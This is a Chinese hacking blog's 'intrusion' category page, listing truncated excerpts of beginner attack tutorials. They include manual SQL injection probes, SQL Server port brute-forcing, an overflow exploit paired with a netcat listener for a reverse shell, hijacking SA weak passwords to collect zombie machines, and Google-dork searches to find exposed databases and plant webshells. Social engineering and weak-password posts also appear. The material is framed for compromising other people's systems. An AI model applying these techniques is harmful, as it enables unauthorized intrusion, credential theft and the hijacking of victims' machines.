当前位置: 首页 > 入侵
  • 2010.1.12百度被黑(DNS被劫持) ,历史回顾

    一、2006年9月12日(17时30分至18时)——半小时 2006年9月12日傍晚5时30分左右,有北京、重庆等地的网友称从当天17时30分开始,百度无法正常使用。在对百度服务器执行“Ping”命令时发现域名丢包率达到100%,返回了“请求超时”的信息。 随后,百度网站“www.baidu.com”,发现首页能正常登录,但搜索内容时,速度极慢,近10秒钟 ...

    阅读全文
    作者:逝魂 | 分类:杂七杂八 | 阅读:3,716 次浏览 | 标签:,
  • 怕工具有毒,那就学手工注入

    1 判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0&l ...

    阅读全文
    作者:逝魂 | 分类:网络共享 | 阅读:2,695 次浏览 | 标签:
  • 各个端口的入侵方法(入侵菜鸟必看)

    1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 ============================= 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:3,485 次浏览 | 标签:
    各个端口的入侵方法(入侵菜鸟必看)已关闭评论
  • 入侵XP常用的七种方法

    本文介绍黑客入侵Windows XP的几个常用方法,提醒用户小心防备。   第一招、屏幕保护   在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:2,973 次浏览 | 标签:
    入侵XP常用的七种方法已关闭评论
  • 远程桌面连接超出最大连接数解决办法

    Windows服务器远程桌面连接受连接数限制,总会发生“超出最大连接数”问题,以下2个方法可以从短期和长期两个方面解决这个情况: 一、当服务器已经出现不允许远程链接时候远程注销登录用户可使用下面的命令: mstsc /console /v:IP:远程端口 (如:mstsc /console /v:222.222.222.222:2222) 二、重新进入服务器设置 1.开 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:3,525 次浏览 | 标签:,
    远程桌面连接超出最大连接数解决办法已关闭评论
  • 入侵最常用的弱口令

    大家可以核查一下自己操作系统是否有这样的密码: .data:0040A038 dd offset aAdmin ; “admin” .data:0040A03C dd offset aAdmin_0 ; “Admin” .data:0040A040 dd offset aPassword ; “password” .data:0040A044 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:8,487 次浏览 | 标签:,
    入侵最常用的弱口令已关闭评论
  • 利用SQL分离器实现sa弱口令强行入侵

    我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。 下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。 注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。 一.更改sa口令方法: 用sql综合利用工具连接后,执行 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:2,995 次浏览 | 标签:,
    利用SQL分离器实现sa弱口令强行入侵已关闭评论
  • 社会工程学利用三个步骤

    第一部分:社会工程学—信息刺探 一、善用你身边的信息 尽量利用现有所知道的信息,这些信息将能处理好突发事件,此类信息指的是规章、制度、方法、约定。规章,指的是一个行业的规章,我们可以认为是行规,或是内部约定,比如,货摊A为了抢掉货摊B的生意,故意低压低价格来龚断是不对,违反了不正当经营法了。 所以我 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:3,597 次浏览 | 标签:,
    社会工程学利用三个步骤已关闭评论
  • 黑客入侵个人电脑的常用途径

    孙子兵法上说,知己知彼,百战不殆。要想有效的防范黑客对我们电脑的入侵和破坏,仅仅被动的安装防火墙是显然不够的,我们更应该了解一些常见的黑客入侵手法,针对不同的方法采取不同的措施,做到有的放矢。 1木马入侵   木马也许是广大电脑爱好者最深恶痛绝的东东了,相信不少朋友都受到过它的骚扰。木马有可能是黑 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:3,327 次浏览 | 标签:
    黑客入侵个人电脑的常用途径已关闭评论
  • 教菜鸟拿webshell

    教菜鸟拿webshell教菜鸟快速拿下WEBSHELL工具网上都有的: 挖掘机 v1.1 辅臣数据游览器 一名话木马 ASP马 首先打开挖掘机 v1.1, 选择“添加后缀”加入一个新的后缀“/database/userdata.mdb”并勾选,其他后缀全都不要勾 关键词填“inurl:xxlr1.asp?ID=” 开始 看下方的检测结果里一会就会出了很多数据库地址 随便选取一个 ...

    阅读全文
    作者:逝魂 | 分类:学习天地 | 阅读:3,755 次浏览 | 标签:,
    教菜鸟拿webshell已关闭评论